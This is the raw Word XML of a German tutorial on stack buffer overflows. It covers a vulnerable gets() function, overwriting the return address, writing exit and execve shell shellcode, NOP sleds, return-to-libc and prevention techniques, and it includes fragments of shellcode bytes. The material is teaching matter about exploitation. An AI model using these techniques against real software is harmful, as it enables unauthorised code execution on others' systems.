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A40" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Overflow</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="134929183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:rsidR="00513834" w:rsidRDefault="00513834">
          <w:pPr>
            <w:pStyle w:val="Inhaltsverzeichnisberschrift"/>
          </w:pPr>
          <w:r>
            <w:t>Inhalt</w:t>
          </w:r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9281403" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Buffer? Overlow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4" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Eine einfache angreifbare Funk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5" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Remember Stack 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6" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stack Layout unseres angreifbaren Program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7" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Beobachtun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8" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Shell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09" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Code in Shellcode umwandel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0" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ExitShellcode ausfüh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1" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Shellcode zum Öffnen einer Shell schreib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2" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stack für execve() betrach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3" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Assembler Equival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4" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Probleme mit diesem Shell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5" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benutzbaren Shellcode für Execve() erstell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6" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploiting des Programms ExploitMe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7" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stack von ExploitMe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8" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wie können wir das ausnutzen(exploi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19" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Konzept von HackYou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0" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Quellcode HackYou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1" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Durch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2" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Return to Li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3" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NOP-Rutschen machen das Leben einfacher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4" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Techniken um Buffer Overflow zu verhind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5" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Non-Executable S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6" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Return to Li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7" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Was ist der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8" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wie nutzen wir das aus und warum funktioniert es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29" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Stackaufba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30" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ExploitMe2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31" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GetEnvironmentVarAddr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pPr>
            <w:pStyle w:val="Verzeichnis3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39281432" w:history="1">
            <w:r w:rsidRPr="000C4D7E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ret2Libc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1AF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3834" w:rsidRDefault="00513834">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc339281403"/>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Overlow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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– temporärer Platz im Speicher der zur Speicherung von Daten genutzt wird</w:t>
      </w:r>
    </w:p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Overflow – Passiert, wenn Daten in den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> geschrieben werden, die Größer sind als der </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> und aufgrund nicht ausreichend geprüfter Grenzen des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, und angrenzende Speicherbereiche überschreiben</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc339281404"/>
      <w:r>
        <w:t>Eine einfache angreifbare Funktion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC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A3695E" wp14:editId="140DFCCA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>85837</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4000500" cy="1138443"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24130"/>
                <wp:wrapNone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11384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9EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
                            <w:pPr>
                              <w:pStyle w:val="KeinLeerraum"/>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>GetInpu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]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ge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pu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17.75pt;margin-top:6.75pt;width:315pt;height:89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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
                      <w:pPr>
                        <w:pStyle w:val="KeinLeerraum"/>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>GetInput</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>()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{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]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ge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pu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roofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() prüft nicht ob die Größe der Eingabe &gt; als die Größe des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc339281405"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Remember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Layout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRPr="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:r>
        <w:object w:dxaOrig="6765" w:dyaOrig="8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9pt;height:287.2pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1413023287" r:id="rId10"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513834" w:rsidRDefault="00513834" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc339281406"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Layout unseres angreifbaren Programms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:r>
        <w:object w:dxaOrig="6028" w:dyaOrig="9345">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:301.45pt;height:467.6pt" o:ole="">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1413023288" r:id="rId12"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc339281407"/>
      <w:r>
        <w:t>Beobachtungen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/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2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>12 Byte müssen aufgefüllt werden um zu RET zu kommen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Dann müssen die nächsten 4 Byte gefüllt werden für den neuen Wert von RET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Wenn die Funktion zu Ende ist, wird der neue RET Wert genutzt um zu entscheiden was als nächstes ausgeführt wird</w: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Pr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc339281408"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/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Wenn wir die Kontrolle über die Return Adresse haben, können wir ihn auf „unseren ausführbaren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>“ zeigen lassen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Payload ist Maschinencode welcher direkt von der CPU ausgeführt wird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Dieser Payload wird </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> genannt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Standardmäßig wird es genutzt um eine Shell zu öffnen, daher der Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc339281409"/>
      <w:r>
        <w:t xml:space="preserve">Code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> umwandeln</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11"/>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Code in C schreiben und ausführbare Datei erstell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Disassemblen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der ausführbaren Datei und Assembler äquivalent betracht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Unnötigen Code entfern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Code in Assembler neu schreiben</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRPr="008B1A26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Objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> benutzen, um den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> herauszufinden:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> –d &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>assemblerdatei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRPr="00A52A11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A7895A" wp14:editId="714D35D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488440" cy="1366520"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Textfel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440" cy="13665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" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.85pt;width:117.2pt;height:107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A171B33" wp14:editId="237B3FE2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2054420</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112506</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488880" cy="1367043"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone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880" cy="1367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 xml:space="preserve"> :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2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3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:161.75pt;margin-top:8.85pt;width:117.25pt;height:10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 xml:space="preserve"> :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2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8B1A26" w:rsidRDefault="008B1A26" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc339281410"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExitShellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ausführen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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4E7819" wp14:editId="3F623D5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103617</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3889180" cy="2510043"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Textfeld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9180" cy="2510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bb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x14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xb8\x01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+2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 xml:space="preserve">;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4" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.15pt;width:306.25pt;height:197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bb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x14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xb8\x01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+2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 xml:space="preserve">;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Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verschiebt nach dem Start des Programms, die Speicheradresse des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in die Return Adresse, und überschreibt die eigentliche Return Adresse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsid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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36D8C9F0" wp14:editId="35C7DC06">
            <wp:extent cx="3619500" cy="175260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5641B8">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00621AF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der Mainfunktion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5091DE" wp14:editId="60F8DA9F">
            <wp:extent cx="5746159" cy="4497105"/>
            <wp:effectExtent l="0" t="0" r="6985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7" cy="451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5641B8">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00621AF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - ESP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>register</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sowie Code an der aktuellen RET Adresse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRP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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E7F1F5" wp14:editId="6E3A28EE">
            <wp:extent cx="5667375" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="9525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5641B8">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00621AF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - ESP nach Überschreibung des RET Wertes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRPr="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48412600" wp14:editId="065BAB70">
            <wp:extent cx="5695950" cy="200977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r w:rsidR="005641B8">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00621AF0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="005641B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der Aktuellen RET Adresse - zeigt auf unseren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A2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B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc339281411"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zum Öffnen einer Shell schreiben</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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CCAE93" wp14:editId="1851EA70">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2396064</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130936</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="685800" cy="2396490"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="10" name="Geschweifte Klammer recht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396490"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightBrace">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 85895"/>
                            <a:gd name="adj2" fmla="val 50839"/>
                          </a:avLst>
                        </a:prstGeom>
                        <a:ln w="254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Geschweifte Klammer rechts 10" o:spid="_x0000_s1026" type="#_x0000_t88" style="position:absolute;margin-left:188.65pt;margin-top:10.3pt;width:54pt;height:188.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" adj="5309,10981" strokecolor="black [3213]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9B8489" wp14:editId="7E3837EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130936</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1946080" cy="2396999"/>
                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="9" name="Textfel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3969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2]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=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1]=NULL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,</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>args,NULL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9" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:10.3pt;width:153.25pt;height:18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2]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=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1]=NULL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,</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>args,NULL</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>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C6C68E" wp14:editId="5DBC23CE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3076575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247538</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="343368"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone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4336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>
